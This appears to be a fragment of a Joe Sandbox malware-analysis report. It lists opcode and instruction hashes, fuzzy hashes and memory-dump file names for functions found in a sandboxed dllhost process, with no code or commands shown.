                                                                                                      • Instruction ID: a47364959fc241459d8fc97a21da327724415326e728a576e25b7616056b5bc3
                                                                                                      • Opcode Fuzzy Hash: 84672ea98a493d0398bb9826fe37032fe11489771306d7da9abd0e9e584d6e23
                                                                                                      • Instruction Fuzzy Hash: 3111CEB5A0074C9BC720DFA9C888FAEBBF8EF84714F1800EAE505EB641DA79D941C750
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                      • Instruction ID: 5dc740548ad6e6a6a2ca9503e87ab0fb8af1943bd0315d6fa732054de3560e53
                                                                                                      • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                      • Instruction Fuzzy Hash: 92019236600205AFD721FFD8CC40F5ABAA9EB85B50F0984A4E945DB261E771ED41C790
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                      • Instruction ID: 229689287db1c84efe5072146e4097b51d8b17aa3d003e5c2da56ee97d528058
                                                                                                      • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                      • Instruction Fuzzy Hash: FD01B975250609FFEB11DFD9CC80E52F76DFF54790B440565F1548A560C731AC60C7A5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                      • Instruction ID: f953152c1854b8e37c9e695c236cebee289fc186b0c06eb163f3fa07b46dc551
                                                                                                      • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                      • Instruction Fuzzy Hash: A3010431604B119FCB70CF19A840A227BA8FB85B70704856DF9998B780C731D420DFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 202803c4c022ea31666db3a73d43d86a6329d437029fbe239cba374ee57b044d
                                                                                                      • Instruction ID: 277887b33954775368ec95bd0de1f478482b9333236238935e7f468194ccb38e
                                                                                                      • Opcode Fuzzy Hash: 202803c4c022ea31666db3a73d43d86a6329d437029fbe239cba374ee57b044d
                                                                                                      • Instruction Fuzzy Hash: D6114C7464561CABEB65EBA8CC41FE9B278EF04710F5045D4A314EA1E0D6709A91CF85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4338b446c4a5dd5268073c948fb166c99190affd2d92201095d2e65c341ff5d7
                                                                                                      • Instruction ID: 36eb954f792ff5458d8b34c2b9af254e1e5dcb6709240f44e8757061f8eb1fb9
                                                                                                      • Opcode Fuzzy Hash: 4338b446c4a5dd5268073c948fb166c99190affd2d92201095d2e65c341ff5d7
                                                                                                      • Instruction Fuzzy Hash: CC11793A241740EFCB26EF99CD80F16BBB9FB44A44F2400A5F905DB6A1D635ED01CA90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                      • Instruction ID: bd0f2709934e6da40dc6ea669bf490b8972cbe1ac16a49768b5b9a9d851e1a16
                                                                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                      • Instruction Fuzzy Hash: F6012432200310CBEF50CAA9DD84BA2B76ABFC4704F1949E5ED45CF285DAB1CC81C390
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 475dabe7f48c0fc9010a109d0a419eed8fd5c392de3f8579e444f6c2f980716e
                                                                                                      • Instruction ID: 366cf174e38bdd40bddb3387615e0b07c94efa49129592d94dac30a0a768d2a4
                                                                                                      • Opcode Fuzzy Hash: 475dabe7f48c0fc9010a109d0a419eed8fd5c392de3f8579e444f6c2f980716e
                                                                                                      • Instruction Fuzzy Hash: 93111B7690011DABCB11EBD8CC80DDF7B7CEF48254F0441A6A506E7210EA34EA15CBE1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                      • Instruction ID: 29bbeb44d218a24fc94acde863e89362c879d012bf688e13e4ff1a12750a491a
                                                                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                      • Instruction Fuzzy Hash: 0901F5321007099FDB22DAAAC800AA7B7EDFFC4210F084899BE46CB640DA70E406C751
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e717717c03cad9ab76785ccb60ee40be78f9e9158e924c061630a6d0c1c7d3ea
                                                                                                      • Instruction ID: 9315c4ac3b4e698ae9e0a2c1ffdc7ea098d0024d5faebc68406e9715654f8051
                                                                                                      • Opcode Fuzzy Hash: e717717c03cad9ab76785ccb60ee40be78f9e9158e924c061630a6d0c1c7d3ea
                                                                                                      • Instruction Fuzzy Hash: F7111B75A0124CABDB05EFA8C851BAE7BBAEB44644F1040D9F906DB250D635EA11CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                      • Instruction ID: 5b5853ecb8afc2dab273f495d11df86008f8aa9f8f748e8513c7f512b4fa2af5
                                                                                                      • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                      • Instruction Fuzzy Hash: C011AD32910B11DFD721DF15C880B22B3E4BF49762F1988ACE6898E6A6C375E880CB11
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                      • Instruction ID: 294d271c84cb7bd9e04182970c55054bc42b8da59eb78b7fcdc4962f3c7f65e9
                                                                                                      • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                      • Instruction Fuzzy Hash: 9001D63A700225A7CB16DADEDC10E5BBEFC9FA5640B1504E9B905D7120EAB4DA81C7A0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                      • Instruction ID: af8e24b8c173da90972cc240ec52777d3a00f1349d351d5f5c21609f3eb3647d
                                                                                                      • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                      • Instruction Fuzzy Hash: A7014C75A04244DBD710DAE8E404F657369DB86624F1441D6FD25CF380CB34E904C7D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f3464625d92e8ddc43267471880aa1f23610aceac6b816157a23562832b5be37
                                                                                                      • Instruction ID: 12ad0f5e05541d7cd76cd84cb85ebe1d402ab35e58b318a7a7292663d9fa21b6
                                                                                                      • Opcode Fuzzy Hash: f3464625d92e8ddc43267471880aa1f23610aceac6b816157a23562832b5be37
                                                                                                      • Instruction Fuzzy Hash: F8016735700608EFD714EBADDC049AEB7B9FF85620B1940A99A01EB744DF70ED02C792
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                      • Instruction ID: a1afa641cfdc3528336c1f0df08c75f2939542c72b9bbe4ab0a74621428b8631
                                                                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                      • Instruction Fuzzy Hash: 11014872200684DFD322D69DC948F66B7DCEB84B54F0D04E1FC05CBA91D768E850C621
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 37857c4167bc7a805a576d1eb73c24e2c6dceebb50e5347340767458d78b49f6
                                                                                                      • Instruction ID: 7028d454464c14b4101f9b3cf5c25bf381dbb371b84619c2e660d9d3d276431e
                                                                                                      • Opcode Fuzzy Hash: 37857c4167bc7a805a576d1eb73c24e2c6dceebb50e5347340767458d78b49f6
                                                                                                      • Instruction Fuzzy Hash: DB018F75A00358ABDB10EBE9D805FAFBBB8EF84704F0440A6F500EB380D6B4D900C7A5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                      • Instruction ID: b5cafb8eba517b483480cbd549cb4629095d27f83c3e645681aff15e871b3567
                                                                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                      • Instruction Fuzzy Hash: 87F0FC372047279FC733D6594880B2BE699AFC9AE4F1A0435F3059F304C9648C01A6D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7faab3119249fc314c6050b1c9ed166514a88d5a9bb4ca9f5117639d86034d52
                                                                                                      • Instruction ID: 839222ea426d6308ee89c97f5e0832ebd72997654337da04ffe1b37533bcb48d
                                                                                                      • Opcode Fuzzy Hash: 7faab3119249fc314c6050b1c9ed166514a88d5a9bb4ca9f5117639d86034d52
                                                                                                      • Instruction Fuzzy Hash: ED012C75A1020DAFDB00DFA9D941AEEBBF8EF49304F14409AE904FB340D774AA018BA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1a4a01fa0d33d2faef16d3e98e372d8fdf7690bc2f4447c8f184b2183492e587
                                                                                                      • Instruction ID: 240664f167f7b3776ca1315cf2509cb2a3ed50d4ad368b0637aa19b735fcb489
                                                                                                      • Opcode Fuzzy Hash: 1a4a01fa0d33d2faef16d3e98e372d8fdf7690bc2f4447c8f184b2183492e587
                                                                                                      • Instruction Fuzzy Hash: 28012CB5A0030DAFCB00DFA9D941AEEB7F8EF49304F54409AE504FB380E774A9018BA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4616d6486ef75b41ecbd306e6b7b8ad0fb92fe573903581887396956d2649ef7
                                                                                                      • Instruction ID: 5c206dccd64215f0fdbc6edd3b79dbaa8336706d003913653962822c0fff4b4b
                                                                                                      • Opcode Fuzzy Hash: 4616d6486ef75b41ecbd306e6b7b8ad0fb92fe573903581887396956d2649ef7
                                                                                                      • Instruction Fuzzy Hash: 36011A75A1030DABCB04DFA9D941AAEB7B8EF49304F14409AE905EB341D774AA018BA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                      • Instruction ID: 04d5faef90edfe2f9e0ea7b985e313865c262b249cc41e927a0e1a05cacb3ea4
                                                                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                      • Instruction Fuzzy Hash: F6F044B6600615ABD334CF8D9840E67FBEADBC5A90F058169A555DB220E631DD05CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                      • Instruction ID: 52d6d753e6adc2762ab765c6beb5d90d944bae55c7005b34f963baa25f68b539
                                                                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                      • Instruction Fuzzy Hash: FFF0FF72A01214AFE719CF9CC841F6AF7EDEB46650F0940A9D500DB230E671DE04CAD4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 42ad6e797240d800e86d96bc413608b6fef01f27bf7931b276c0ea493fe5a71e
                                                                                                      • Instruction ID: d8dbf334c38aed912b61c4c49be105fc17def4d6ed8bf9429132d87cb3516898
                                                                                                      • Opcode Fuzzy Hash: 42ad6e797240d800e86d96bc413608b6fef01f27bf7931b276c0ea493fe5a71e
                                                                                                      • Instruction Fuzzy Hash: DA010074E0074E9FCB04DFE9D545A9EB7F4EF48304F108096A955EB341E674DA00CB95
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
